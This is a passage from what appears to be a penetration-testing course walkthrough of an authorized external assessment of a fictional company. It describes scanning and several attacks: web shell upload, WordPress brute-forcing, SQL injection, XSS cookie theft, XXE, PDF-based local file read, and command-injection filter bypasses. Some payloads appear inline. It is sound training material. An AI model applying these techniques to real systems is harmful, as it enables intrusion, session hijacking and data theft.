External Testing
External Information Gathering
We start with a quick initial Nmap scan against our target to get a lay of the land and see what we're dealing with. We ensure to save all scan output to the relevant subdirectory in our project directory.
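A sketch of what such a scan might look like (the target IP and project paths here are placeholders, not values from the engagement):

```shell
# Quick scan of the top 1,000 TCP ports, saving output in all
# formats (-oA) to the project's scans subdirectory
sudo nmap -v --open -oA scans/ilfreight_quick_tcp 10.129.203.101
```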
We notice 11 ports open from our quick top 1,000 port TCP scan. It seems that we are dealing with a web server that is also running some additional services such as FTP, SSH, email (SMTP, POP3, and IMAP), DNS, and at least two web application-related ports.
In the meantime, we have been running a full port scan using the -A flag (aggressive scan options) to perform additional enumeration, including OS detection, version scanning, and script scanning. Keep in mind that this is a more intrusive scan than just running with the -sV flag for version scanning, and we should be careful to make sure that any scripts run during the script scan will not cause any issues.
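A sketch of the full scan (the IP and output paths are again placeholders):

```shell
# Aggressive scan of all TCP ports: OS detection, version
# detection, default scripts, and traceroute
sudo nmap -v -A -p- --open -oA scans/ilfreight_full_tcp 10.129.203.101
```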
The first thing we can see is that this is an Ubuntu host running an HTTP proxy of some kind. We can use this handy Nmap grep cheatsheet to "cut through the noise" and extract the most useful information from the scan. Let's pull out the running services and port numbers, so we have them handy for further investigation.
From these listening services, there are several things we can try immediately, but since we see DNS is present, let's try a DNS Zone Transfer to see if we can enumerate any valid subdomains for further exploration and expand our testing scope. We know from the scoping sheet that the primary domain is INLANEFREIGHT.LOCAL, so let's see what we can find.
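For example, with dig (the name server IP is a placeholder):

```shell
# Request a full zone transfer (AXFR) for the primary domain
dig AXFR inlanefreight.local @10.129.203.101
```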
The zone transfer works, and we find 9 additional subdomains. In a real-world engagement, if a DNS Zone Transfer is not possible, we could enumerate subdomains in many ways; the DNSDumpster.com website is a quick bet. The Information Gathering - Web Edition module lists several methods for Passive Subdomain Enumeration and Active Subdomain Enumeration.
If DNS were not in play, we could also perform vhost enumeration using a tool such as ffuf. Let's try it here to see if we find anything else that the zone transfer missed. We'll use this dictionary list to help us, which is located at /opt/useful/seclists/Discovery/DNS/namelist.txt on the Pwnbox.
To fuzz vhosts, we must first figure out what the response looks like for a non-existent vhost. We can choose anything we want here; we just want to provoke a response, so we should choose something that very likely does not exist.
Trying to specify defnotvalid in the Host header gives us a response size of 15157. We can infer that this will be the same for any invalid vhost, so let's work with ffuf, using the -fs flag to filter out responses of size 15157, since we know them to be invalid.
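The resulting command might look like this (the target IP is a placeholder):

```shell
# Fuzz the Host header, filtering out the 15157-byte response
# that invalid vhosts return
ffuf -w /opt/useful/seclists/Discovery/DNS/namelist.txt:FUZZ \
     -u http://10.129.203.101/ -H "Host: FUZZ.inlanefreight.local" -fs 15157
```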
Comparing the results, we see one vhost that was not part of the results from the DNS Zone Transfer we performed.
Enumeration Results
From our initial enumeration, we noticed several interesting ports open that we will probe further in the next section. We also gathered several subdomains/vhosts. Let's add these to our /etc/hosts file so we can investigate each further.
In the next section, we'll dig deeper into the Nmap scan results and see if we can find any directly exploitable or misconfigured services.
Service Enumeration & Exploitation
Listening Services
Our Nmap scans uncovered a few interesting services:
Port 21: FTP
Port 22: SSH
Port 25: SMTP
Port 53: DNS
Port 80: HTTP
Ports 110/143/993/995: POP3 & IMAP
Port 111: rpcbind
We already performed a DNS Zone Transfer during our initial information gathering, which yielded several subdomains that we'll dig into deeper later. Other DNS attacks aren't worth attempting in our current environment.
FTP
Let's start with FTP on port 21. The Nmap Aggressive Scan discovered that FTP anonymous login was possible. Let's confirm that manually.
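A manual check might look like this (the target IP is a placeholder):

```shell
# Connect and try the anonymous user with a blank password
ftp 10.129.203.101
# Name: anonymous
# Password: <press Enter>
# 230 Login successful.
```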
Connecting with the anonymous user and a blank password works. It does not look like we can access any interesting files besides one, and we also cannot change directories.
We are also unable to upload a file.
Other attacks, such as an FTP Bounce Attack, are unlikely, and we don't have any information about the internal network yet. Searching for public exploits for vsFTPd 3.0.3 only shows this PoC for a Remote Denial of Service, which is out of the scope of our testing. Brute-forcing won't help us here either since we don't know any usernames.
This looks like a dead end. Let's move on.
SSH
Next up is SSH. We'll start with a banner grab:
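For example, with Netcat (the IP is a placeholder):

```shell
# Grab the SSH banner without authenticating
nc -nv 10.129.203.101 22
# Expect a banner along the lines of:
# SSH-2.0-OpenSSH_8.2p1 Ubuntu ...
```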
This shows us that the host is running OpenSSH version 8.2, which has no known vulnerabilities at the time of writing. We could try some password brute-forcing, but we don't have a list of valid usernames, so it would be a shot in the dark. It's also doubtful that we'd be able to brute-force the root password. We can try a few combos such as admin:admin, root:toor, admin:Welcome, and admin:Pass123, but have no success.
SSH looks like a dead end as well. Let's see what else we have.
Email Services
SMTP is interesting. We can consult the Attacking Email Services section of the Attacking Common Services module for help. In a real-world assessment, we could use a website such as MXToolbox or the tool dig to enumerate MX records.
Let's do another scan against port 25 to look for misconfigurations.
Next, we'll check for any misconfigurations related to authentication. We can try to use the VRFY command to enumerate system users.
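A manual check could look like this (the IP is a placeholder; the exact reply codes depend on the mail server in use):

```shell
telnet 10.129.203.101 25
# HELO test.local
# VRFY root
# 252 2.0.0 root            <- a 2xx reply: the user likely exists
# VRFY notarealuser
# 550 5.1.1 <notarealuser>: Recipient address rejected
```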
We can see that the VRFY command is not disabled, and we can use this to enumerate valid users. This could potentially be leveraged to gather a list of users we could use to mount a password brute-forcing attack against the FTP and SSH services, and perhaps others. Though this is relatively low-risk, it's worth noting down as a Low finding for our report, as our clients should reduce their external attack surface as much as possible. If there is no valid business reason for this command to be enabled, then we should advise them to disable it.
We could attempt to enumerate more users with a tool such as smtp-user-enum to drive the point home and potentially find more users. It's typically not worth spending much time brute-forcing authentication for externally-facing services. This could cause a service disruption, so even if we can make a user list, we can try a few weak passwords and move on.
We could repeat this process with the EXPN and RCPT TO commands, but it won't yield anything additional.
The POP3 protocol can also be used to enumerate users, depending on how it is set up. We can try to enumerate system users with the USER command again; if the server replies with +OK, the user exists on the system. This doesn't work for us. Probing port 995, the SSL/TLS port for POP3, doesn't yield anything either.
The Footprinting module contains more information about common services and enumeration principles and is worth reviewing again after working through this section.
We'd want to look further at the client's email implementation in a real-world assessment. If they are using Office 365 or on-prem Exchange, we may be able to mount a password spraying attack that could yield access to email inboxes or potentially the internal network if we can use a valid email password to connect over VPN. We may also come across an Open Relay, which we could possibly abuse for Phishing by sending emails as made-up users or spoofing an email account to make an email look official and attempt to trick employees into entering credentials or executing a payload. Phishing is out of scope for this particular assessment and likely will be for most External Penetration Tests, so this type of vulnerability would be worth confirming and reporting if we come across it, but we should not go further than simple validation without checking with the client first. However, this could be extremely useful on a full-scope red team assessment.
We can check for it anyway, but we do not find an open relay, which is good for our client!
Moving On
Port 111 is the rpcbind service, which should not be exposed externally, so we could write up a Low finding for Unnecessary Exposed Services or similar. This port can be probed to fingerprint the operating system or potentially gather information about available services. We can try to probe it with the rpcinfo command or Nmap. It works, but we do not get back anything useful. Again, worth noting down so the client is aware of what they are exposing, but nothing else we can do with it.
It's worth consulting this HackTricks guide on Pentesting rpcbind for future awareness regarding this service.
The last port is port 80, which, as we know, is the HTTP service. We know there are likely multiple web applications based on the subdomain and vhost enumeration we performed earlier, so let's move on to web. We still don't have a foothold or much of anything aside from a handful of medium- and low-risk findings. In modern environments, we rarely see externally exploitable services like a vulnerable FTP server or similar that will lead to remote code execution (RCE). Never say never, though. We have seen crazier things, so it is always worth exploring every possibility. Most organizations we face will be most susceptible to attack through their web applications, as these often present a vast attack surface, so we'll typically spend most of our time during an External Penetration Test enumerating and attacking web applications.
Web Enumeration & Exploitation
As mentioned in the previous section, web applications are where we usually spend most of our time during an External Penetration Test. They often present a vast attack surface and can suffer from many classes of vulnerabilities that can lead to remote code execution or sensitive data exposure, so we should be thorough with them. One thing to remember is that there is a difference between a Web Application Security Assessment (WASA) and an External Penetration Test. In a WASA, we are typically tasked with finding and reporting any and all vulnerabilities, no matter how mundane (i.e., a web server version in the HTTP response headers, a cookie missing the Secure or HttpOnly flag, etc.). We don't want to get bogged down with these types of findings during an External Penetration Test since we typically have a lot of ground to cover. The Scope of Work (SoW) document should clearly differentiate between the two assessment types. It should explicitly state that during an External Penetration Test, we will perform cursory web application testing, looking for high-risk vulnerabilities. If we don't have many findings at all, we can dig into the web applications deeper, and we can always include a catch-all Best Practice Recommendation or Informational finding that lists out several common security-related HTTP response header issues that we see all the time, among other minor issues. This way, we've fulfilled the contract by going after the big issues such as SQL injection, unrestricted file upload, XSS, XXE, file inclusion attacks, command injection, etc., but covered ourselves with the informational finding in case the client comes back asking why we didn't report X.
Web Application Enumeration
The quickest and most efficient way to get through a bunch of web applications is using a tool such as EyeWitness to take screenshots of each web application, as covered in the Application Discovery & Enumeration section of the Attacking Common Applications module. This is particularly helpful if we have a massive scope for our assessment and browsing each web application one at a time is not feasible. In our case, we have 11 subdomains/vhosts (for now), so it's worth firing up EyeWitness to help us out, as we want to be as efficient as possible to give the client the best possible assessment. This means speeding up any tasks that can be performed more efficiently, without running the risk of missing things. Automation is great, but if we're missing half of whatever we're going after, then the automation is doing more harm than good. Make sure you understand what your tools are doing, and periodically spot-check things to ensure your tools and any custom scripts are working as expected.
We can feed EyeWitness an Nmap .xml file or a Nessus scan, which is useful when we have a large scope with many open ports, as can often be the case during an Internal Penetration Test. In our case, we'll just use the -f flag to give it the list of subdomains in a text file we enumerated earlier.
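Something along these lines, assuming our subdomain list is saved as ilfreight_subdomains.txt:

```shell
# Screenshot each web application from our subdomain list
eyewitness --web -f ilfreight_subdomains.txt -d ilfreight_eyewitness
```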
The EyeWitness results show us multiple very interesting hosts, any one of which could potentially be leveraged to gain a foothold into the internal network. Let's work through them one by one.
blog.inlanefreight.local
First up is the blog.inlanefreight.local subdomain. At first glance, it looks promising. The site seems to be a forgotten Drupal install or perhaps a test site that was set up and never hardened. We can consult the Attacking Common Applications module for ideas.
Using cURL, we can see that Drupal 9 is in use.
A quick Google search shows us that the current stable Drupal version intended for production is release 9.4, so we will probably have to get lucky and find some sort of misconfiguration, such as a weak admin password, to abuse built-in functionality or a vulnerable plugin. Well-known vulnerabilities such as Drupalgeddon 1-3 do not affect version 9.x of Drupal, so that's a dead end. Trying to log in with a few weak password combinations such as admin:admin, admin:Welcome1, etc., does not bear fruit. Attempting to register a user also fails, so we move on to the next application.
We could note in our report that this Drupal instance looks like it's not in use and could be worth taking down to further reduce the overall external attack surface.
careers.inlanefreight.local
Next up is the careers subdomain. These types of sites often allow a user to register an account, upload a CV, and potentially a profile picture. This could be an interesting avenue of attack. Browsing first to the login page http://careers.inlanefreight.local/login, we can try some common authentication bypasses and fuzz the login form to provoke some sort of error message or time delay that would be indicative of a SQL injection. As always, we test a few weak password combinations such as admin:admin. We should also always test login forms (and forgot password forms, if they exist) for username enumeration, but none is apparent in this case.
The http://careers.inlanefreight.local/apply page allows us to apply for a job and upload a CV. Testing this functionality shows that it allows any file type to be uploaded, but the HTTP response does not show where the file is located after upload. Directory brute-forcing does not yield any interesting directories such as /files or /uploads that could house a web shell if we could successfully upload a malicious file.
It's always a good idea to test user registration functionality on any web applications we come across, as these can lead to all sorts of issues. In the HTB box Academy, it is possible to register on a web application and modify our role to that of an admin at registration time. This was inspired by an actual External Penetration Test finding where I was able to register on an internet-facing web application for as many as five different user roles. Once logged into that application, all sorts of IDOR vulnerabilities existed, resulting in broken authorization on many pages.
Let's go ahead and register an account at http://careers.inlanefreight.local/register and look around. We register an account with bogus details: test@test.com and the credentials pentester:Str0ngP@ssw0rd!. Sometimes we'll need to use an actual email address to receive an activation link. We can use a disposable email service such as 10 Minute Mail so as not to clutter up our inbox, or keep a dummy account with ProtonMail or similar just for testing purposes. You'll be happy you didn't use your actual email address the first time Burp Suite Active Scanner hits a form and sends you 1,000+ emails in rapid succession. Register with decently strong credentials, too. You don't want to introduce a security issue into the web application you're tasked with testing by registering with credentials such as test:test that could potentially be left on the application long after the test is over (though we should, of course, list in an appendix of our report any modifications made during testing, even registering on a public-facing website).
Once registered, we can log in and browse around. We're greeted with our profile page at http://careers.inlanefreight.local/profile?id=9. Attempting to fuzz the id parameter for SQLi, command injection, file inclusion, XSS, etc., does not prove fruitful. The ID number itself is interesting, though. Tweaking this number shows us that we can access other users' profiles and see what jobs they applied to. This is a classic example of an Insecure Direct Object Reference (IDOR) vulnerability and would definitely be worth reporting due to the potential for sensitive data exposure.
After exhausting all options here, we walk away with one decent reportable vulnerability to add to our findings list and move on to the next web application. We can use any directory brute-forcing tool here, but we'll go with Gobuster.
dev.inlanefreight.local
The web application at http://dev.inlanefreight.local is simple yet catches the eye. Anything with dev in the URL or name is interesting, as it could be accidentally exposed and riddled with flaws/not production-ready. The application presents a simple login form titled Key Vault. This looks like a homegrown password manager or similar and could lead to considerable data exposure if we can get in. Weak password combinations and authentication bypass payloads don't get us anywhere, so let's go back to the basics and look for other pages and directories. Let's try first with the common.txt wordlist, using the .php file extension for the first run.
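For example, with Gobuster (the wordlist path assumes a standard Kali/Pwnbox layout):

```shell
gobuster dir -u http://dev.inlanefreight.local \
    -w /usr/share/wordlists/dirb/common.txt -x php
```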
We get a few interesting hits. Files returned with a 403 Forbidden error code typically exist, but the web server doesn't allow us to browse to them anonymously. The uploads directory and upload.php page immediately call our attention. If we're able to upload a PHP web shell, chances are we can browse right to it in the /uploads directory, which has directory listing enabled. We can note this down as a valid low-risk finding, Directory Listing Enabled, and capture the necessary evidence to make report writing quick and painless. Browsing to /upload.php gives us a 403 Forbidden error message and nothing more, which is interesting because the status code is a 200 OK success code. Let's dig into this deeper.
We'll need Burp Suite here to capture the request and see if we can figure out what's going on. If we capture the request, send it to Burp Repeater, and then re-request the page using the OPTIONS method, we see that various methods are allowed: GET,POST,PUT,TRACK,OPTIONS. Cycling through the various options, each gives us a server error until we try the TRACK method and see that the X-Custom-IP-Authorization: header is set in the HTTP response. We can consult the Web Attacks module's HTTP Verb Tampering section for a refresher on this attack type.
Playing around a bit with the request, adding the header X-Custom-IP-Authorization: 127.0.0.1 to the HTTP request in Burp Repeater and then requesting the page with the TRACK method again yields an interesting result: we see what appears to be a file upload form in the HTTP response body.
If we right-click anywhere in the Response window in Repeater, we can select "Show response in browser", copy the resulting URL, and request it in the browser we are using with the Burp proxy. A photo editing platform loads for us.
We can click on the Browse button and attempt to upload a simple web shell with the following contents:
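One minimal option (the cmd parameter name here is our choice; any simple PHP one-liner shell works):

```php
<?php system($_REQUEST['cmd']); ?>
```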
Save the file as 5351bf7271abaa2267e03c9ef6393f13.php or something similar. It's good practice to use random file names when uploading a web shell to a public-facing website so a random attacker doesn't happen upon it. In our case, we'd want to use something password-protected or restricted to our IP address, since directory listing is enabled and anyone could browse to the /uploads directory and find it. Attempting to upload the .php file directly results in an error, "JPG, JPEG, PNG & GIF files are allowed.", which shows that some weak client-side validation is likely in place. We can grab the POST request, send it to Repeater once again, and try modifying the Content-Type: header in the request to see if we can trick the application into accepting our file as valid. We'll try altering the header to Content-Type: image/png to pass off our web shell as a valid PNG image file. It works! We get the following response: File uploaded /uploads/5351bf7271abaa2267e03c9ef6393f13.php.
We can now use cURL to interact with this web shell and execute commands on the web server.
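For example, assuming the simple cmd-parameter shell suggested earlier:

```shell
curl -s "http://dev.inlanefreight.local/uploads/5351bf7271abaa2267e03c9ef6393f13.php?cmd=id"
```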
Checking the host's IP addressing, it doesn't appear that we've landed inside the Inlanefreight internal network as the IP address is not within the internal network scope. This may just be a standalone web server, so we'll continue on.
From here, we can enumerate the host further, looking for sensitive data, note down another two findings, HTTP Verb Tampering and Unrestricted File Upload, and move on to the next host.
ir.inlanefreight.local
The next target on our list is http://ir.inlanefreight.local, the company's Investor Relations portal, hosted with WordPress. For this, we can consult the WordPress - Discovery & Enumeration section of the Attacking Common Applications module. Let's fire up WPScan and see what we can enumerate, using the -ap flag to enumerate all plugins.
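For example (in current WPScan releases, all-plugin enumeration is selected via the ap value of --enumerate):

```shell
wpscan --url http://ir.inlanefreight.local --enumerate ap
```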
From the scan, we can deduce the following bits of information:
The WordPress core version is the latest (6.0 at the time of writing)
The theme in use is cbusiness-investment
The b2i-investor-tools plugin is installed
The mail-masta plugin is installed
The Mail Masta plugin is an older plugin with several known vulnerabilities. We can use this exploit to read files on the underlying file system by leveraging a Local File Inclusion (LFI) vulnerability. We can add another finding to our list: Local File Inclusion (LFI). Next, let's move on and see if we can enumerate WordPress users using WPScan.
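For example:

```shell
# Enumerate WordPress usernames
wpscan --url http://ir.inlanefreight.local --enumerate u
```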
We find several users:
ilfreightwp
tom
james
john
Let's try to brute-force one of the account passwords using this wordlist from the SecLists GitHub repo. Using WPScan again, we get a hit for the ilfreightwp account.
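A sketch of the attack (the wordlist filename stands in for the SecLists wordlist referenced above):

```shell
# Password attack against the enumerated account
wpscan --url http://ir.inlanefreight.local -U ilfreightwp -P passwords.txt
```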
From here, we can browse to http://ir.inlanefreight.local/wp-login.php and log in using the credentials ilfreightwp:password1. Once logged in, we'll be directed to http://ir.inlanefreight.local/wp-admin/, where we can browse to http://ir.inlanefreight.local/wp-admin/theme-editor.php?file=404.php&theme=twentytwenty to edit the 404.php file for the inactive theme Twenty Twenty and add in a PHP web shell to get remote code execution. After editing this page and achieving code execution following the steps in the Attacking WordPress section of the Attacking Common Applications module, we can record yet another finding for Weak WordPress Admin Credentials and recommend that our client implement several hardening measures if they plan to leave this WordPress site exposed externally.
status.inlanefreight.local
This site looks like another forgotten one that shouldn't be exposed to the internet. It seems to be some sort of internal application for searching through logs. Entering a single quote (') throws a MySQL error message, which indicates the presence of a SQL injection vulnerability: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%'' at line 1. We can exploit this manually using a payload such as:
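One illustrative shape for such a payload (the column count here is hypothetical and would first need to be determined, e.g., with ORDER BY or UNION SELECT NULL probes):

```sql
test' UNION SELECT NULL, @@version-- -
```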
This is an example of a SQL Injection UNION attack.
We can also exploit this with sqlmap. First, capture the POST request using Burp, save it to a file, and mark the searchitem parameter with a * so sqlmap knows where to inject.
Next, we run this through sqlmap as follows:
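A sketch, assuming the captured request was saved as search_request.txt:

```shell
# Let sqlmap find and exploit the injection point marked with *
sqlmap -r search_request.txt --batch
# Then enumerate databases and tables:
# sqlmap -r search_request.txt --batch --dbs
# sqlmap -r search_request.txt --batch -D status --tables
```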
Next, we can enumerate the available databases and see that the status database is particularly interesting. Focusing on the status database, we find that it has just two tables. From here, we could attempt to dump all data from the status database and record yet another finding, SQL Injection. Try this out manually using the SQL Injection Fundamentals module as guidance, and refer to the SQLMap Essentials module if you need help with the tool-based approach.
support.inlanefreight.local
Moving on, we browse the http://support.inlanefreight.local site and see that it is an IT support portal. Support ticketing portals may allow us to engage with a live user and can sometimes lead to a client-side attack where we can hijack a user's session via a Cross-Site Scripting (XSS) vulnerability. Browsing around the application, we find the /ticket.php page, where we can raise a support ticket. Let's see if we can trigger some type of user interaction. Fill out all details for a ticket and include the following in the Message field:
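A typical blind XSS probe for this situation might be (the IP/port are placeholders for our own listener):

```html
"><script src=http://10.10.14.15:9000></script>
```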
Change the IP to your own and start a Netcat listener on port 9000 (or whatever port you desire). Click the Send button and check your listener for a callback to confirm the vulnerability.
This is an example of a Blind Cross-Site Scripting (XSS) attack. We can review methods for Blind XSS detection in the Cross-Site Scripting (XSS) module.
Now we need to figure out how we can steal an admin's cookie so we can log in and see what type of access we can get. We can do this by creating the following two files:
index.php
script.js
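A common cookie-stealing pair for this technique looks roughly like the following (the IP/port are placeholders for our attack host, and the cookies.txt filename is our choice):

index.php:

```php
<?php
// Log any cookie value sent in the "c" parameter, along with the victim's IP
if (isset($_GET['c'])) {
    $file = fopen("cookies.txt", "a+");
    fputs($file, "Victim IP: {$_SERVER['REMOTE_ADDR']} | Cookie: " . urldecode($_GET['c']) . "\n");
    fclose($file);
}
?>
```

script.js:

```javascript
// Send the victim's cookies back to our PHP listener
new Image().src = 'http://10.10.14.15:8000/index.php?c=' + document.cookie;
```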
Next, start a PHP web server on your attack host as follows:
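For example:

```shell
# Serve index.php and script.js from the current directory
php -S 0.0.0.0:8000
```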
Finally, create a new ticket and submit the following in the message field:
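For example, pointing at our own web server (the IP/port are placeholders):

```html
"><script src=http://10.10.14.15:8000/script.js></script>
```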
We get a callback on our web server with an admin's session cookie:
Next, we can use a Firefox plugin such as Cookie-Editor to log in using the admin's session cookie.
Click on the save button to save the cookie named session, and click on Login in the top right. If all is working as expected, we will be redirected to http://support.inlanefreight.local/dashboard.php. Take some time and record yet another finding, Cross-Site Scripting (XSS), noting that it is high-risk because it can be used to steal an active admin's session and access the ticketing queue system. Consult the Cross-Site Scripting (XSS) module for a refresher on XSS and the various ways this class of vulnerability can be leveraged, including session hijacking.
tracking.inlanefreight.local
The site at http://tracking.inlanefreight.local/ allows us to enter a tracking number and receive a PDF showing the status of our order. The application takes user input and generates a PDF document. Upon PDF generation, we can see that the Tracking #: field takes any input (not just numbers) that we specify in the search box before hitting the Track Now button. If we insert a simple JavaScript payload such as <script>document.write('TESTING THIS')</script> and click Track Now, we see that the PDF is generated and the message TESTING THIS is rendered, which seems to mean that the JavaScript code executes when the web server generates the document.
We notice that we can inject HTML as well. A simple payload such as <h1>test</h1> will also render in the Tracking #: field upon PDF generation. Googling for something such as pdf HTML injection vulnerability returns several interesting hits, such as this post and this post discussing leveraging HTML injection, XSS, and SSRF for local file read. While not covered in the Penetration Tester Job Role Path, it is important to note that we will often come across new things during our assessments.
Dealing with The Unexpected
This is where the penetration tester mindset is key. We must be able to adapt, poke and prod, and take the information we find and apply our thought process to determine what is going on. After a bit of probing, we were able to deduce that the web application generates PDF reports, and we can control the input to one field that should only accept numbers, as it seems. Through a bit of research, we were able to identify a class of vulnerability that we may not be familiar with yet, but there is considerable research and documentation on. Many researchers publish extremely detailed research from their own assessments or bug bounties, and we can often use this as a guide to try to find similar issues. No two assessments are the same, but there are only so many possible web application technology stacks, so we are bound to see certain things over and over, and soon things that were new and difficult become second nature. It is worth checking out the Server-side Attacks module to learn more about SSRF and other server-side attacks.
Let's dig through some of these writeups and see if we can produce a similar result and gain local file read. Following this post, let's test for local file read using XMLHttpRequest (XHR) objects, also consulting this excellent post on local file read via XSS in dynamically generated PDFs. We can use this payload to test for file read, first trying for the /etc/passwd file, which is world-readable and should confirm the vulnerability's existence.
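A payload along these lines (adapted from the writeups referenced above) is one way to attempt it:

```html
<script>
    // Read a local file via an XHR to the file:// scheme and
    // write the contents into the page that is rendered to PDF
    x = new XMLHttpRequest();
    x.onload = function() { document.write(this.responseText); };
    x.open("GET", "file:///etc/passwd");
    x.send();
</script>
```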
We paste the payload into the search box and hit the Track Now button, and the newly generated PDF displays the file's contents back to us, so we have local file read!
It's worth reading these blog posts, studying this finding and its impact, and becoming familiar with this class of vulnerability. If we were to encounter something like this during a penetration test that we are unfamiliar with but seemed "off," we could refer to the Penetration Testing Process to perform an analysis of the situation. If we did our research and still could not uncover the vulnerability, we should keep detailed notes of what we've tried and our thought process and ask our peers and more senior members of our team for assistance. Pentest teams often have folks who specialize or are stronger in certain areas, so someone on the team has likely seen this or something similar.
Play around with this vulnerability some more and see what else you can gain access to. For now, we'll note down another high-risk finding, SSRF to Local File Read, and move on.
vpn.inlanefreight.local
It's common to come across VPN and other remote access portals during a penetration testing engagement. This appears to be a Fortinet SSL VPN login portal. During testing, we confirmed that the version in use was not vulnerable to any known exploits. This could be an excellent candidate for password spraying in a real-world engagement, provided we take a careful and measured approach to avoid account lockout.
We try a few common/weak credential pairs but get the following error message: Access denied., so we can move on from here to the next application.
gitlab.inlanefreight.local
Many companies host their own GitLab instances and sometimes don't lock them down properly. As covered in the GitLab - Discovery & Enumeration section of the Attacking Common Applications module, there are several steps an admin can take to limit access to a GitLab instance, such as:
Requiring admin approval for new sign-ups
Configuring an allowlist of domains permitted to sign up
Configuring a deny list
Occasionally, we will come across a GitLab instance that is not adequately secured. If we can gain access to a GitLab instance, it is worth digging around to see what type of data we can find. We may discover configuration files containing passwords, SSH keys, or other information that could further our access. After registering, we can browse to /explore to see what projects, if any, we have access to. We can see that we can access the shopdev2.inlanefreight.local project, which gives us a hint at another subdomain that we did not uncover using the DNS Zone Transfer and likely could not find using subdomain brute-forcing.
Before exploring the new subdomain, we can record another high-risk finding: Misconfigured GitLab Instance.
shopdev2.inlanefreight.local
Our enumeration of the GitLab instance led to another vhost, so let's first add it to our /etc/hosts
file so we can access it. Browsing to http://shopdev2.inlanefreight.local
, we're redirected to a /login.php
login page. Typical authentication bypasses don't get us anywhere, so we go back to the basics per the Attacking Common Applications
module Application Discovery & Enumeration section and try some weak credential pairs. Sometimes it's the simplest things that work (and yes, we do see this type of stuff in production, both internal AND external), and we can log in with admin:admin
. Once logged in, we see some sort of online store for purchasing wholesale products. When we see dev
in a URL (especially external-facing), we can assume it is not production-ready and worth digging into, especially because of the comment Checkout Process not Implemented
near the bottom of the page.
We can test the search functionality for injection vulnerabilities and hunt around for IDORs and other flaws, but we don't find anything particularly interesting. Let's test the purchasing flow, focusing on the shopping cart checkout process, and capture the requests in Burp Suite. Add an item or two to the cart and browse to /cart.php
and click the I AGREE
button so we can analyze the request in Burp. Looking at Burp, we see that a POST
request is made with XML
in the body like so:
Think back to the module content, namely the Web Attacks module; this looks like a good candidate for XML External Entity (XXE) Injection
because the form seems to be sending data to the server in XML format. We try a few payloads and finally can achieve local file read to view the contents of the /etc/passwd
file with this payload:
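The exact payload depends on which XML element the application reflects back in its response; the sketch below shows the general shape of such a payload, with element names assumed from a typical cart request.

```python
# Sketch of the XXE technique used here. The element names (item, quantity,
# name) are assumptions -- the real payload reuses whatever element the
# application echoes back in its response.
file_to_read = "/etc/passwd"

payload = f"""<?xml version="1.0"?>
<!DOCTYPE item [
  <!ENTITY xxe SYSTEM "file://{file_to_read}">
]>
<item>
  <quantity>1</quantity>
  <name>&xxe;</name>
</item>"""

# The DOCTYPE declares an external entity pointing at a local file; when the
# server-side parser expands &xxe; inside an element that is reflected in the
# response, the file contents come back to us.
print(payload)
```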
Let's jot down another high-risk finding, XML External Entity (XXE) Injection (we've got quite the list so far!), and move on to the last vhost/subdomain.
monitoring.inlanefreight.local
We discovered the monitoring
vhost earlier, so we won't repeat the process. We used ffuf, but this enumeration can also be performed with other tools. Give it a try with GoBuster
to become comfortable with more tools. Browsing to http://monitoring.inlanefreight.local
results in a redirect to /login.php
. We can try some authentication bypass payloads and common weak credential pairs but don't get anywhere, just receiving the Invalid Credentials!
error every time. Since this is a login form, it is worth exploring further, so we fuzz it a bit with Burp Intruder to see if we can provoke an error message indicative of a SQL injection vulnerability, but we are not successful.
An analysis of the POST request and response in Burp Suite does not yield anything interesting. At this point, we've exhausted nearly all possible web attacks and turn back to the module content, remembering the Login Brute Forcing module that focuses on the tool hydra
. This tool can be used to brute-force HTTP login forms, so let's give it a go. We'll use the same wordlist from the SecLists
GitHub repo as earlier.
We'll set up hydra
to perform the brute-forcing attack, specifying the Invalid Credentials!
error message to filter out invalid login attempts. We get a hit for the credential pair admin:12qwaszx, a common "keyboard walk" password that is easy to remember but can be very easily brute-forced/cracked.
Once logged in, we are presented with some sort of monitoring console. If we type help
, we are presented with a list of commands. This seems like a restricted shell environment to perform limited tasks and something very dangerous that should not be exposed externally. The last class of vulnerabilities taught in the Penetration Tester Job Role Path
that we have not yet covered is Command Injections.
We walk through each of the commands. Trying cat /etc/passwd
does not work, so it does appear that we are indeed in a restricted environment. whoami
and date
provide us with some basic information. We don't want to reboot
the target and cause a service disruption. We are unable to cd
to other directories. Typing ls
shows us a few files that are likely stored in the directory that we are currently restricted to.
Looking through the files, we find what appears to be an authentication service, and we also discover that we are inside a container. The last option in the list is connection_test
. Typing that in yields a Success
message and nothing more. Going back over to Burp Suite and proxying the request, we see that a GET
request is made to /ping.php
for the localhost IP 127.0.0.1
, and the HTTP response shows a single successful ping attack. We can infer that the /ping.php
script is running an operating command using a PHP function such as shell_exec(ping -c 1 127.0.0.1)
or perhaps similar using the system() function to execute a command. If this script is coded improperly, it could easily result in a command injection vulnerability, so let's try some common payloads.
There seems to be some sort of filtering in place, because trying standard payloads like GET /ping.php?ip=127.0.0.1;id
and GET /ping.php?ip=127.0.0.1|id
result in an Invalid input
error, meaning there is probably a character blacklist in play. We can bypass this filter by using a line feed character %0A
(or new-line character) as our injection operator, following the methodology discussed in the Bypassing Space Filters section. We can make a request appending the new-line character like so: GET /ping.php?ip=127.0.0.1%0a, and the ping is still successful, meaning the character is not blacklisted.
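The reason %0a works is that a blacklist covering `;`, `|`, and `&` often forgets that a bare newline also separates commands in sh. A quick local demonstration:

```python
import subprocess

# Why %0a works: URL-decoded, %0a is "\n", and a bare newline separates
# commands in sh just like ";" does -- but naive blacklists rarely include it.
payload = "echo first\necho second"   # decoded form of: echo first%0aecho second
out = subprocess.run(["/bin/sh", "-c", payload],
                     capture_output=True, text=True).stdout
print(out)  # both commands ran

# A typical character blacklist never even sees the injection:
blacklist = [";", "|", "&"]
print(any(ch in "127.0.0.1\nid" for ch in blacklist))  # False -- filter bypassed
```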
We've won the first battle, but there seems to be another type of filter in place, as trying something like GET /ping.php?ip=127.0.0.1%0aid
still results in an Invalid input
error. Next, we can play around with the command syntax and see that we can bypass the second filter using single quotes. Switching to cURL
, we can run the id
command as follows:
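The single-quote trick works because the shell concatenates adjacent quoted and unquoted string segments into one word before execution, so `'i'd` is the same command as `id`, yet a filter matching the literal string no longer sees it. Demonstrated locally with echo:

```python
import subprocess

# The shell joins adjacent (quoted) segments into a single word, so
# 'e'ch'o' is the same command as echo -- but a filter looking for the
# literal command name no longer matches.
out = subprocess.run(["/bin/sh", "-c", "'e'ch'o' bypassed"],
                     capture_output=True, text=True).stdout
print(out)
```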
We have achieved command execution as the webdev
user. Digging around a bit more, we see that this host has multiple IP addresses, one of which places it inside the 172.16.8.0/23
